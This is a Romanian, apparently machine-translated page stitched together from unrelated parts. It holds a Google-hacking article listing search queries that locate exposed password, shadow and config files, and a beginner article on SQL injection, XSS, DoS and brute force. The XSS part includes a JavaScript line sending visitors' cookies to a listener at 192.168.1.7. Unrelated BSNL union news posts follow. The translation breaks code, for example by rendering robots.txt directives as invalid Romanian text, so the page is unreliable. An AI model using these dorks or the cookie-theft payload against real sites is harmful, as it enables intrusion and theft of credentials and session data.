Un administrator cu experiență poate schimba aceste informații, dar, de regulă, este adevărat. Astfel, pentru a obține aceste informații este suficient să trimiteți o solicitare:

intitle:index.of server.at

Pentru a obține informații pentru un anumit server, clarificăm cererea:

intitle:index.of server.at site:ibm.com

Sau invers, căutăm servere care rulează versiune specifică servere:

intitle:index.of Apache/2.0.40 Server la

Această tehnică poate fi folosită de un hacker pentru a găsi o victimă. Dacă, de exemplu, are un exploit pentru o anumită versiune a serverului WEB, atunci îl poate găsi și încerca exploitul existent.

De asemenea, puteți obține versiunea serverului vizualizând paginile care sunt instalate implicit când instalați cea mai recentă versiune a serverului WEB. De exemplu, pentru a vedea pagina de testare Apache 1.2.6, trebuie doar să tastați

intitle:Test.Pagina.pentru.Apache a funcționat!

Mai mult, unii sisteme de operareÎn timpul instalării, ei instalează și lansează imediat serverul WEB. Cu toate acestea, unii utilizatori nici măcar nu sunt conștienți de acest lucru. Desigur, dacă vezi că cineva nu a eliminat pagina implicită, atunci este logic să presupunem că computerul nu a suferit deloc personalizare și este probabil vulnerabil la atac.

Încercați să căutați pagini IIS 5.0

allintitle:Bine ați venit la Windows 2000 Internet Services

În cazul IIS, puteți determina nu numai versiunea serverului, ci și versiunea Windows și Service Pack.

O altă modalitate de a determina versiunea serverului WEB este să căutați manuale (pagini de ajutor) și exemple care pot fi instalate implicit pe site. Hackerii au găsit destul de multe modalități de a folosi aceste componente pentru a obține acces privilegiat la un site. De aceea trebuie să eliminați aceste componente de pe locul de producție. Ca să nu mai vorbim de faptul că prezența acestor componente poate fi folosită pentru a obține informații despre tipul de server și versiunea acestuia. De exemplu, să găsim manualul apache:

inurl:manual apache directive module

Folosind Google ca scaner CGI.

Scanerul CGI sau scanerul WEB este un utilitar pentru căutarea de scripturi și programe vulnerabile pe serverul victimei. Aceste utilitare trebuie să știe ce să caute, pentru asta au o listă întreagă de fișiere vulnerabile, de exemplu:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Putem găsi fiecare dintre aceste fișiere folosind Google, folosind în plus cuvintele index of sau inurl cu numele fișierului în bara de căutare: putem găsi site-uri cu scripturi vulnerabile, de exemplu:

allinurl:/random_banner/index.cgi

Folosind cunoștințe suplimentare, un hacker poate exploata vulnerabilitatea unui script și poate folosi această vulnerabilitate pentru a forța scriptul să emită orice fișier stocat pe server. De exemplu, un fișier cu parole.

Cum să te protejezi de hackingul Google. 1. Nu postați date importante pe serverul WEB.

Chiar dacă ați postat datele temporar, este posibil să le uitați sau cineva va avea timp să găsească și să preia aceste date înainte de a le șterge. Nu face asta. Există multe alte modalități de a transfera date care le protejează de furt.

2. Verificați-vă site-ul.

Utilizați metodele descrise pentru a vă cerceta site-ul. Verificați-vă periodic site-ul pentru noi metode care apar pe site-ul http://johnny.ihackstuff.com. Rețineți că, dacă doriți să vă automatizați acțiunile, trebuie să obțineți permisiunea specială de la Google. Daca citesti cu atentie http://www.google.com/terms_of_service.html, atunci veți vedea fraza: Nu puteți trimite interogări automate de niciun fel către sistemul Google fără permisiunea prealabilă expresă a Google.

3. Este posibil să nu aveți nevoie de Google pentru a vă indexa site-ul sau o parte a acestuia.

Google vă permite să eliminați un link către site-ul dvs. sau o parte a acestuia din baza de date, precum și să eliminați pagini din cache. În plus, puteți interzice căutarea de imagini pe site-ul dvs., interziceți afișarea unor fragmente scurte de pagini în rezultatele căutării. Toate posibilitățile de ștergere a unui site sunt descrise în pagină http://www.google.com/remove.html. Pentru a face acest lucru, trebuie să confirmați că sunteți cu adevărat proprietarul acestui site sau să introduceți etichete în pagină sau

4. Folosiți robots.txt

Se știe că motoarele de căutare se uită la fișierul robots.txt aflat la rădăcina site-ului și nu indexează acele părți care sunt marcate cu cuvântul Disallow. Puteți utiliza acest lucru pentru a preveni indexarea unei părți a site-ului. De exemplu, pentru a preveni indexarea întregului site, creați un fișier robots.txt care să conțină două rânduri:

Agent utilizator: *
Nu permite: /

Ce se mai întâmplă

Pentru ca viața să nu vi se pară dragă, voi spune în sfârșit că există site-uri care monitorizează acei oameni care, folosind metodele descrise mai sus, caută găuri în scripturi și servere WEB. Un exemplu de astfel de pagină este

Aplicație.

Un pic dulce. Încercați câteva dintre următoarele:

1. #mysql dump filetype:sql - caută dumpurile bazei de date date mySQL
2. Raportul Rezumat al Vulnerabilității Gazdei - vă va arăta ce vulnerabilități au găsit alți oameni
3. phpMyAdmin rulează pe inurl:main.php - acest lucru va forța controlul să fie închis prin panoul phpmyadmin
4. nu pentru distribuire confidenţială
5. Solicitare detalii Control Tree Server Variables
6. Alergare în modul Copil
7. Acest raport a fost generat de WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – poate cineva are nevoie de fișiere de configurare pentru firewall? :)
10. intitle:index.of finances.xls – hmm....
11. intitle:Indexul chat-urilor dbconvert.exe – jurnalele de chat icq
12.intext: Analiza traficului Tobias Oetiker
13. intitle:Statistici de utilizare pentru Generate de Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets deține secrete partajate - cheie secretă - găsire bună
17. inurl:main.php Bine ați venit la phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin note
20. ORA-00921: sfârșit neașteptat al comenzii SQL – obținerea căilor
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc umbra
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • „Hacking cu Google”

    • Centrul de instruire „Informzashchita” http://www.itsecurity.ru - un centru specializat de frunte în domeniul formării securitatea informatiei(Licența Comitetului de Educație din Moscova nr. 015470, acreditare de stat nr. 004251). Singurul centru de instruire autorizat pentru companii Securitate Internet Sisteme și Clearswift în Rusia și țările CSI. Centru de instruire autorizat Microsoft (specializare Securitate). Programele de instruire sunt coordonate cu Comisia Tehnică de Stat a Rusiei, FSB (FAPSI). Certificate de pregătire și documente de stat privind pregătirea avansată.

    SoftKey este un serviciu unic pentru cumpărători, dezvoltatori, dealeri și parteneri afiliați. În plus, acesta este unul dintre cele mai bune magazine online de software din Rusia, Ucraina, Kazahstan, care oferă clienților o gamă largă, multe metode de plată, procesare promptă (adesea instantanee) a comenzii, urmărirea procesului comenzii în secțiunea personală, diverse reduceri de la magazinul și producătorii BY.

    Am decis să vorbesc puțin despre securitatea informațiilor. Articolul va fi util pentru programatorii începători și pentru cei care tocmai au început să se implice în dezvoltarea Frontend. Care este problema?

    Mulți dezvoltatori începători sunt atât de distrași de scrierea codului încât uită complet de securitatea muncii lor. Și, cel mai important, ei uită de vulnerabilități precum interogările SQL și XXS. De asemenea, vin cu parole ușoare pentru panourile lor administrative și sunt supuși forței brute. Care sunt aceste atacuri și cum le poți evita?

    injecție SQL

    Injecția SQL este cel mai comun tip de atac asupra unei baze de date, care este efectuat în timpul unei interogări SQL pentru un anumit DBMS. Mulți oameni și chiar companii mari suferă de astfel de atacuri. Motivul este o eroare a dezvoltatorului la scrierea bazei de date și, strict vorbind, a interogărilor SQL.

    Un atac de injectare SQL este posibil din cauza procesării incorecte a datelor de intrare utilizate în interogările SQL. Dacă atacul unui hacker are succes, riscați să pierdeți nu numai conținutul bazelor de date, ci și parolele și jurnalele. panoul administrativ. Și aceste date vor fi destul de suficiente pentru a prelua complet site-ul sau pentru a-i face ajustări ireversibile.

    Atacul poate fi reprodus cu succes în scripturi scrise în PHP, ASP, Perl și alte limbi. Succesul unor astfel de atacuri depinde mai mult de ce DBMS este utilizat și de modul în care este implementat scriptul în sine. Există multe site-uri vulnerabile pentru injecții SQL în lume. Acest lucru este ușor de verificat. Doar introduceți „dorks” - acestea sunt interogări speciale pentru căutarea site-urilor vulnerabile. Iată câteva dintre ele:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Cum să le folosești? Este suficient să le introduceți motor de căutare Google sau Yandex. Motorul de căutare vă va oferi nu doar un site vulnerabil, ci și o pagină despre această vulnerabilitate. Dar nu ne vom opri aici și ne vom asigura că pagina este cu adevărat vulnerabilă. Pentru a face acest lucru, este suficient să puneți un singur ghilimele „‘ după valoarea „id=1”. Ceva de genul asta:

    • inurl:games.php?id=1’

    Și site-ul ne va da o eroare despre interogare SQL. De ce mai are nevoie hackerul nostru?

    Și apoi are nevoie de acest link către pagina de eroare. Apoi, lucrul asupra vulnerabilității are loc în majoritatea cazurilor în distribuția „Kali linux” cu utilitățile sale pentru această parte: introducerea codului de injecție și efectuarea operațiunilor necesare. Cum se va întâmpla asta, nu vă pot spune. Dar puteți găsi informații despre acest lucru pe Internet.

    Atacul XSS

    Acest tip de atac este efectuat pe Cookie-uri. Utilizatorilor, la rândul lor, le place să le salveze. De ce nu? Ce ne-am face fără ei? La urma urmei, datorită Cookie-urilor, nu trebuie să introducem parola pentru Vk.com sau Mail.ru de o sută de ori. Și puțini sunt cei care le refuză. Dar pe internet apare adesea o regulă pentru hackeri: coeficientul de comoditate este direct proporțional cu coeficientul de insecuritate.

    Pentru a implementa un atac XSS, hackerul nostru are nevoie de cunoștințe de JavaScript. La prima vedere, limbajul este foarte simplu și inofensiv, deoarece nu are acces la resursele computerului. Un hacker poate lucra doar cu JavaScript într-un browser, dar este suficient. La urma urmei, principalul lucru este să introduceți codul în pagina web.

    Nu voi vorbi în detaliu despre procesul de atac. Vă voi spune doar elementele de bază și semnificația modului în care se întâmplă acest lucru.

    Un hacker poate adăuga cod JS la un forum sau carte de oaspeți:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Scripturile ne vor redirecționa către pagina infectată, unde va fi executat codul: fie că este un sniffer, un fel de stocare sau un exploit, care ne va fura cumva Cookie-urile din cache.

    De ce JavaScript? Deoarece JavaScript este excelent în gestionarea solicitărilor web și are acces la Cookie-uri. Dar dacă scriptul nostru ne duce pe un site, utilizatorul îl va observa cu ușurință. Aici hackerul folosește o opțiune mai vicleană - pur și simplu introduce codul în imagine.

    Img=new Image();

    Img.src="http://192.168.1.7/sniff.php?"+document.cookie;

    Pur și simplu creăm o imagine și îi atribuim scriptul ca adresă.

    Cum să te protejezi de toate acestea? Este foarte simplu - nu faceți clic pe linkuri suspecte.

    Atacurile DoS și DDos

    DoS (din limba engleză Denial of Service - refuzul serviciului) este un atac de hacker asupra unui sistem informatic cu scopul de a-l determina eșuarea. Aceasta este crearea condițiilor în care utilizatorii de sistem de bună credință nu pot accesa resursele de sistem furnizate (servere), sau acest acces este dificil. O defecțiune a sistemului poate fi și un pas către preluarea sa dacă, într-o situație de urgență, software-ul produce unele informații critice: de exemplu, o versiune, o parte a unui cod de program etc. Dar cel mai adesea aceasta este o măsură a presiunii economice: pierderea unui serviciu simplu care generează venituri. Facturile de la furnizor sau măsurile de evitare a unui atac au lovit în mod semnificativ „ținta” din buzunar. În prezent, atacurile DoS și DDoS sunt cele mai populare, deoarece permit aproape oricărui sistem să eșueze fără a lăsa dovezi semnificative din punct de vedere legal.

    Care este diferența dintre atacul DoS și DDos?

    DoS este un atac construit într-un mod inteligent. De exemplu, dacă serverul nu verifică corectitudinea pachetelor primite, atunci un hacker poate face o solicitare care va dura o veșnicie pentru a procesa și nu va fi suficient timp de procesor pentru a lucra cu alte conexiuni. În consecință, clienților li se va refuza serviciul. Dar nu va fi posibil să supraîncărcați sau să dezactivați site-uri mari cunoscute în acest fel. Sunt înarmați cu canale destul de largi și servere super-puternice care pot face față unei astfel de supraîncărcări fără probleme.

    DDoS este de fapt același atac ca și DoS. Dar dacă în DoS există un pachet de solicitare, atunci în DDoS pot exista sute sau mai multe dintre ele. Chiar și serverele super-puternice ar putea să nu poată face față unei astfel de supraîncărcări. Să vă dau un exemplu.

    Un atac DoS este atunci când ai o conversație cu cineva, dar apoi apare o persoană prostească și începe să strige tare. Este fie imposibil, fie foarte greu să vorbești. Soluție: sună la pază, care se va liniști și va scoate persoana din incintă. Atacurile DDoS sunt atunci când o mulțime de mii de astfel de oameni prost maniere intră în grabă. În acest caz, securitatea nu va putea să-i lege pe toți și să-i ia.

    DoS și DDoS sunt efectuate de pe computere, așa-numiții zombi. Acestea sunt computere ale utilizatorilor piratați de hackeri care nici măcar nu bănuiesc că mașina lor participă la un atac asupra vreunui server.

    Cum să te protejezi de asta? În general, în niciun caz. Dar poți face lucrurile mai dificile pentru un hacker. Pentru a face acest lucru, trebuie să alegeți o găzduire bună cu servere puternice.

    Atacul cu forță brută

    Un dezvoltator poate veni cu o mulțime de sisteme de protecție împotriva atacurilor, poate revizui complet scripturile pe care le-am scris, poate verifica site-ul pentru vulnerabilități etc. Dar când ajunge la ultimul pas al aspectului site-ului, și anume atunci când pur și simplu pune o parolă pe panoul de administrare, poate uita de un lucru. Parolă!

    Nu este strict recomandat să setați o parolă simplă. Acesta ar putea fi 12345, 1114457, vasya111 etc. Nu este recomandat să setați parole mai mici de 10-11 caractere. În caz contrar, este posibil să fii supus celui mai comun și mai simplu atac - Forța brută.

    Forța brută este un atac cu parolă de dicționar folosind programe speciale. Dicționarele pot fi diferite: latină, enumerare după numere, să zicem, până la un anumit interval, mixte (latină + numere), și există chiar și dicționare cu caractere unice @#4$%&*~~`’”\ ? etc.

    Desigur, acest tip de atac este ușor de evitat parolă complexă. Chiar și un captcha te poate salva. De asemenea, dacă site-ul tău este realizat pe un CMS, atunci mulți dintre ei detectează acest tip de atac și blochează IP-ul. Trebuie să vă amintiți întotdeauna că, cu cât sunt mai multe caractere diferite dintr-o parolă, cu atât este mai greu de ghicit.

    Cum funcționează hackerii? În cele mai multe cazuri, fie suspectează, fie cunosc o parte din parolă în avans. Este destul de logic să presupunem că parola utilizatorului nu va consta cu siguranță din 3 sau 5 caractere. Astfel de parole duc la hacking frecvent. Practic, hackerii iau un interval de la 5 până la 10 caractere și adaugă mai multe caractere pe care ar putea să le cunoască în avans. În continuare, parolele cu intervalele necesare sunt generate. Distribuția Kali Linux are chiar și programe pentru astfel de cazuri. Și voilà, atacul nu va mai dura mult, deoarece volumul dicționarului nu mai este atât de mare. În plus, un hacker poate folosi puterea plăcii video. Unele dintre ele acceptă sistemul CUDA, iar viteza de căutare crește de până la 10 ori. Și acum vedem că atacul este așa într-un mod simplu destul de real. Dar nu doar site-urile web sunt supuse forței brute.

    Dragi dezvoltatori, nu uitați niciodată de sistemul de securitate a informațiilor, deoarece astăzi mulți oameni, inclusiv state, suferă de astfel de tipuri de atacuri. La urma urmei, cea mai mare vulnerabilitate este o persoană care poate oricând să fie distrasă undeva sau să rateze ceva. Suntem programatori, dar nu mașini programate. Fii mereu în gardă, pentru că pierderea informațiilor poate avea consecințe grave!

    Mesaje actualizate în luna ianuarie 2020

    16-01-2020

    Mesaj de condoleanțe

    SNEA își exprimă întristarea profundă pentru dispariția

    Lider veteran

    Com K.Viswanathan

    Trezorier CHQ al JETA/JTOA (de 3 ori)

    19/11, D block Nandhini Flats Church Road, Chrompet Chennai 44,


    15-01-2020

    15-01-2020

    15-01-2020

    O descoperire vitală pentru serviciul FTTH Triple Play prin BSNL:

    Politica deschisă pentru furnizarea de IPTV: Politica mult așteptată de furnizare a serviciilor IPTV prin BSNL FTTH de către furnizorii/partenerii de conținut a fost emisă de BSNL CO.

    Această întreprindere este prezentată ca răspunsul BSNL la jucătorii privați importanți care furnizează servicii Triple Play --

    Prin acest proiect, BSNL va oferi clienților Serviciul Real Triple Play, deoarece aici Vizionarea TV nu va consuma date de pe Internet.

    Aceasta va fi o linie de salvare majoră pentru revigorarea BSNL.

    Această întreprindere a fost deja dezvoltată și implementată cu succes în mod privat de un LCO/TIP din Thrissur BA în Kerala Circle, cu sprijinul tehnic al talentelor interne ale BSNL, conduse de Com Anoop K J, JTO OMCR, Ernakulam.

    Ei au conceput o aplicație pentru a efectua/primi apeluri telefonice folosind telefonul mobil folosind WiFi.

    Acest proiect a fost prezentat la recenta întâlnire CWC a SNEA, organizată la Bangalore, în august 2019.

    Au fost primite diverse Propuneri de la diferite Cercuri pentru implementarea IPTV prin Rețeaua BSNL.

    Absența IPTV (sau a serviciului TV) a fost identificată ca unul dintre motivele majore pentru răspunsul lipsit de strălucire la conexiunile BSNL FTTH de la LCO cu mai mulți operatori din întreaga țară.

    SNEA a continuat proiectul la toate nivelurile și suntem bucuroși să vedem lumină la capătul tunelului.

    Felicităm talentele interne din BSNL care și-au arătat potențialul real.

    SNEA mulțumește tuturor ofițerilor care au lucrat pentru implementarea proiectului în BSNL CO și tuturor Birourilor Circle și în special Com. P Padmanabha Rao, AGS și DGM, BSNL CO.

    Politica de deschidere IPTV  

    15-01-2020

    Restructurare organizațională: fuziunea cercurilor neteritoriale.

    Cercurile de întreținere și proiect au fuzionat și au fost redenumite ca rețea centrală de transmisie (Est/Vest/Nord/Sud). Cerc separat pentru nord-est și anume rețeaua centrală-regiunea NE de transmisie care acoperă cercurile AS, NE I și NE II. În vigoare de la 04.01.2020.

    Fabricile de telecomunicații au fuzionat cu cercurile lor teritoriale respective ca șef BA w.e.f 02.01.2020.

    NCNGN Circle a fuzionat cu BBNW Circle.

    Nodal Center Chandigarh a fuzionat cu Punjab Circle.

    Un singur cerc de formare cu sediul central la ALTTC, Gaziabad. ALTTC, NATFM și BRBRAITT vor funcționa ca șefi BA. Doar RTTC-uri zonale în viitor.

    Scrisoarea de intenție   Anexă

    15-01-2020


    14-01-2020

    GS îi scrie lui Shri P K Purwar, CMD/BSNL:

    Vă rugăm să luați măsuri imediate pentru Promovare regulată în loc de aranjament de îngrijireîn diferite Grade din rândul Directorilor care lucrează deja în scale superioare prin simpla schimbare a denumirii pentru a umple vidul imens creat în unitățile de teren de VRS 2019 și pentru a-i motiva pe directori să preia o sarcină suplimentară:

    Conform datelor disponibile, la data de 02.01.2020,

    i) Doar 57 DGM(T) vor fi disponibile împotriva puterii sancționate de 1481.

    ii) Doar 32 de DGM(Fin) vor fi disponibile împotriva puterii sancționate de 402.

    iii) Doar 1746 AGA(T) vor fi disponibile în BSNL în loc de 6500 AGA care funcționează cu un an în urmă. La promovarea DGM, numărul AGA va fi de aproximativ 1200, mai puțin de 20%. SDE-urile cu 15 ani de serviciu așteaptă promovarea.

    iv) Doar 70 de CAO vor fi disponibile împotriva puterii sancționate de 1347. Acestea nu vor fi suficiente nici măcar pentru omul cel posturi vacante DGM(Fin).

    v) Mii de directori de la trepte superioare lucrează în JTO, clase echivalente SDE de la 5 la 30 de ani și așteaptă promovarea. JTO recrutați din 1988 așteaptă promovarea în aripa Arch. Mii de loturi JTO din 1999, 2001 până în 2008, 2010, 2013 etc. așteaptă prima lor promovare. Starea aripii JTO(Civil/Elect/TF) este la fel de proastă.

    Ne opunem total la aranjamentul predominant de îngrijire după care este urmat de conducere în loc de promovarea obișnuită. Directorii lucrează deja în scări superioare și pot fi promovați la clase superioare în mod regulat doar prin schimbarea desemnării, în loc de aranjamentul LA.

    Scrisoare GS către CMD  

    11-01-2020

    Întâlnire cu Shri Arvind Vadnerkar, DIR(HR) la 01.09.2020: GS, președintele și ambele AGS s-au întâlnit cu DIR(HR) în prezența Sr GM(Pers & Estt), GM(SR), GM(Restg), GM( Admn) și GM(Pers) și au purtat discuții pe următoarele probleme:

    Norme de angajare și restructurare a BSNL: Am explicat că norma de angajare temporară emisă de celula Restg nu este deloc viabilă deoarece realitățile de teren nu sunt luate în considerare de către conducere. Conform normelor temporare, unele SSA conduse de GM astăzi trebuie să fie conduse de un SDE în viitor. Va exista un număr mare de mici SSA cu zone geografice uriașe în care doar unul sau doi directori vor fi justificați. Practic va fi imposibil să se mențină serviciile în acele zone. Prin externalizare, rolul și responsabilitatea Directorilor nu vor scădea mai ales pe segmentul CFA. În zonele rurale, clubing toate lucrările de Transmisie, BTS mtce, EB, întreținere cablu cu SDE(Group) cu suprafețe vaste va învinge chiar scopul. În mod similar, normele zonelor urbane sunt, de asemenea, stricte. Deci normele temporare urmează să fie reelaborate imediat. În caz contrar, nimeni nu se va prezenta să lucreze în uzina externă și Trans mtce și cei care lucrează vor solicita și postare în interior, mobil etc. În mod similar, înlocuitorii nu sunt marcați în multe SSA pentru o preluare fără probleme la 31.01.2020. Directorul și GM (Restg) au explicat că doar normele temporare pot fi revizuite. Am cerut să revizuim imediat.

    Am explicat în continuare cererea din partea unităților de teren ca și întreținerea cablului primar să fie inclusă în licitația pentru externalizare. Dintre TT-urile disponibile, foarte puțini au cunoștințe despre îmbinarea cablurilor și nu sunt suficiente pentru întreținerea tuturor cablurilor primare. Altele sunt necesare pentru întreținerea interioară/MDF/centrală electrică. Aceste fapte sunt explicate in intalnirea cu DIR(CFA) dar pana acum nu ies decizii favorabile. DIR(HR) a asigurat că va aduce din nou această problemă importantă la cunoştinţa DIR(CFA).

    Promoții în scenariul post VRS și nevoia de promovare regulată în loc de aranjament Lookafter: am protestat ferm împotriva mișcării de a acorda aranjament Look after în loc de promovare obișnuită. Aproape posturile DGM(T/Fin) și notele AGM/CAO/EE vor deveni vacante după VRS pe 31.01.2020 și urmează să se ia măsuri imediate pentru promovare, am cerut. Deoarece un număr mare de directori cu experiență suficientă lucrează la scări superioare, li se poate promova pur și simplu prin schimbarea desemnării, am subliniat. În mod similar, mii de JTO din aripi diferite sunt deja la scări superioare și pot primi promovare prin redesemnare. Nici măcar DPC nu este necesar. Aranjamentul LA este împotriva interesului directorilor, deoarece aceștia pierd serviciul și viitoarele căi de promovare. Managementul face ani în LA împreună și neagă promoțiile regulate. Am cerut oprirea acestui mecanism și să oferim promoții regulate pentru toți Executivii eligibili.

    Despre promoțiile DGM, SNEA a explicat întâlnirea cu secretarul, DoT din 01.01.2020 și decizia sa pozitivă de a permite promovările DGM. Chiar și DoT a promovat la nivelul Sr DDG (CGM) la 30.12.2019 pentru cei care se pensionează la 31.12.2019, dar BSNL nu ia nicio măsură pentru a promova posturile vacante înainte de pensionare. După discuții, DIR(HR) a asigurat că va discuta cu secretarul/DoT și CMD/BSNL și va face tot ce este necesar pentru promovările DGM.

    Reversia JTO-urilor Rect din 2001 a trecut de LDCE -2007: Din nou discuții au avut loc pe această temă și Assn a explicat eligibilitatea lor cu referire la clauza SDE RR 12, nota 5 și clarificările emise în 2007 cu privire la eligibilitatea lor pentru a apărea în LDCE-2007. Acum unele dintre ele sunt inversate pe baza clarificărilor emise în 2012 pentru LDCE 2010. Clarificările emise cu privire la eligibilitatea pentru apariția în LDCE 2007 și LDCE 2010 sunt complet diferite și asta a complicat problema. Eligibilitatea trebuie decisă pe baza clarificărilor emise pentru LDCE 2007, am cerut. Întrucât devin deja SDE, nu au putut scrie DCE ulterioară desfășurată în 2012 și 2015. Printre ei, de asemenea, unele SDE ale TN Circle care se confruntă cu revenirea, în timp ce altele sunt deservite doar arată o notificare privind cauza. Am cerut oprirea procesului de revenire până când chestiunea va fi decisă pe baza faptelor puse în fața conducerii. Am sugerat formarea unui Comitet care să examineze problema. În cele din urmă, DIR(HR) le-a îndrumat ofițerilor în cauză să aducă toate dosarele aferente chiar a doua zi pentru a lua decizia corespunzătoare.

    10-01-2020

    10-01-2020

    10-01-2020

    Întâlnire cu Shri P. K. Purwar, CMD BSNL pe 01.10.2020: Secretarii Generali și AGS-urile AIBSNLEA și SNEA s-au întâlnit astăzi cu CMD BSNL și au avut discuții pe următoarele aspecte:

    Promoții DGM (T): În ceea ce privește promoțiile de la DET la DGM (T), am explicat despre întâlnirea cu secretarul (T) DoT din 01 ianuarie și 03 ianuarie 2020, în care secretarul (T) a fost de acord pentru promoțiile pentru DGM (T) cu condiția să nu creeze implicații financiare suplimentare. CMD BSNL a informat că a discutat și cu secretarul (T) în acest sens și că a încercat să facă ceea ce este necesar.

    Compensarea cotizațiilor în așteptare a recuperărilor din Salariul angajaților: CMD a informat că plata recuperărilor GPF în ceea ce privește optații VRS, aproximativ 710 Crore Rs, va fi eliberată luni. Celelalte taxe vor fi, de asemenea, compensate cel mai devreme.

    Promoții pentru ocuparea posturilor vacante după VRS: În ceea ce privește Promoțiile, CMD este de părere că angajații ar trebui să uite de promovare cel puțin un an și să muncească din greu pentru Reînvierea BSNL. De asemenea, a opinat că mai mult merit va fi introdus în promoții în viitor. Am explicat realitățile de la sol. Aproape toate posturile DGM din aripile de telecomunicații și finanțe, precum și posturile AGM și CAO vor deveni vacante după 31.01.2020 și va deveni dificil să conduceți BSNL după aceea fără a completa aceste posturi vacante pe o bază imediată. Există stagnare în Cadrele JTO și SDE și promovările lor nu pot fi amânate. La momentul recrutării JTO-urilor & JAO-urilor precum și în promoțiile de la JTO la SDE, concursul este disponibil și practic 50% Executivi eligibili la momentul promovării sunt doar din cotă competitivă, am explicat. CMD BSNL a fost de acord cu privire la deficitul de posturi AGM, CAO și DGM după post-VRS 2019.

    Adio angajaților pensionari: la recunoașterea serviciilor pensionarilor, am solicitat restabilirea sumei de 3001 Rs/- deoarece este doar un semn de apreciere a serviciilor lor anterioare în BSNL și de onoare pentru ei. CMD și-a informat handicapul din cauza crizei de numerar din BSNL. În acest caz, am sugerat un aranjament alternativ, cum ar fi cupoane de reîncărcare egale cu acea sumă. CMD a apreciat sugestia noastră și a fost de acord să analizeze alternativa în loc de Cash Award.

    Alocarea proiectelor USOF către BSNL pe bază de nominalizare: Am evaluat CMD BSNL cu privire la alocarea proiectelor USOF către BSNL pe bază de nominalizare. CMD BSNL a menționat că trebuie să facem tot Guvernul. Proiecte/ Proiectele USOF și performanța noastră din anii anteriori a fost foarte bună și am finalizat Guvernul. Proiecte în intervalul de timp. Totuși, simțim că dacă este dat pe bază de nominalizare, va fi bine pentru BSNL, altfel dacă concuram prin licitație, s-ar putea să nu fie benefic pentru BSNL.

    Întreținerea cablurilor primare: Am evaluat în continuare CMD cu privire la dificultățile cu care se confruntă directorii și diferitele cercuri în scenariul post-VRS în întreținerea cablurilor primare, deoarece comenzile de întreținere a cablurilor primare pentru externalizare nu au fost emise de Biroul Corporativ. CMD BSNL a menționat că, din cauza lucrărilor de dezvoltare care se desfășoară în diferite state, Cablul Primar trebuie înlocuit/întreținut în mod frecvent, luând permisiunea de la diferite Guverne Locale de Stat. Organisme/Autorități rutiere pentru care Ofertantul nu se poate prezenta și lucrările noastre de întreținere vor fi suferite grav.

    Întreținerea MDF: susținem cu CMD BSNL ca controlul MDF să fie în cadrul personalului BSNL. CMD BSNL a menționat că tinerii noștri angajați ar trebui să vină în față, să apuce lucrările importante și să își asume responsabilitatea. CMD a mai menționat că, din cauza lipsei de personal în scenariul post VRS, este posibil să nu fie posibilă menținerea MDF non-stop de către personalul BSNL. După discuții detaliate, CMD se asigură că va revizui situația după trei luni.

    08-01-2020

    08-01-2020

    SNEA extinde solidaritate și sprijin moral Grevei Generale a Sindicatelor Centrale din 01.08.2020 împotriva Privatizării Sectorului Public și a altor revendicări

    07-01-2020

    07-01-2020

    Reuniunea Comitetului Executiv al Cercului Assam Circle a avut loc la Guwahati pe 01.04.2020. SG și Jt Sec (Est) au abordat reuniunea extinsă a CEC. Liderii CHQ și-au amintit contribuția liderilor de rang înalt și activiștii au luat VRS. Ei conduc Asociația în timpul diferitelor lupte pentru soluționarea diferitelor revendicări și contribuția lor va fi amintită pentru totdeauna. Toate cotizațiile vor fi achitate până la 31.01.2020, iar despărțirea lor de BSNL va fi lină.

    În cele din urmă, lupta noastră de ani de zile împreună a adus rezultate bune pentru BSNL. Conducerea și Guvernul au încercat să ne suprime lupta prin mai multe mijloace, prin reduceri de salarii, taxe de taxare, arătând notificări de cauză etc etc, dar nu am făcut niciodată compromisuri. În cele din urmă, lupta noastră a scos spectrul 4G gratuit, așa cum am cerut, monetizarea terenului aprobată, întreaga cheltuială a VRS suportată de guvern, obligațiuni de 8500 Cr cu garanție suverană aprobată pentru a acorda sprijin financiar etc.

    Accentul nostru principal este pe revigorarea BSNL. Lansarea 4G este planificată pentru 01.03.2020. Tariful este în creștere, ceea ce este un semn bun pentru industrie și BSNL. Dacă managementul este capabil să implementeze un mecanism bun care să-i ia pe angajați în încredere, Revival este foarte posibil. Totul depinde de management.

    La nivel corporativ, restructurarea BSNL este în desfășurare. În scenariul schimbat, sunt emise linii directoare pentru externalizarea lucrărilor CFA.

    Totuși ne temem că, din cauza condițiilor stricte, poate eșua în multe locuri și BSNL va avea mari probleme în menținerea serviciilor după 02.01.2020, ne anunță conducerea. Este posibil ca muncitorii cu experiență să nu poată participa la licitație.

    Lucrări similare se desfășoară și în alte verticale. Cum ne temem, pe verticala HR, numărul posturilor scade drastic prin restructurare. VRS a aruncat diverse provocări, iar post-reducerea și promovarea este una dintre ele. Amenințarea reducerii posturilor a existat de mulți ani și, anticipând acest lucru, Asociația a elaborat o politică de promovare fără posturi cu mult timp înainte. Acum, întreaga noastră atenție se concentrează pe implementarea sa timpurie, cu data limită de 07/01/2018. Din păcate, unii Executive Assn încă solicită postări

    promovare de la o dată prospectivă

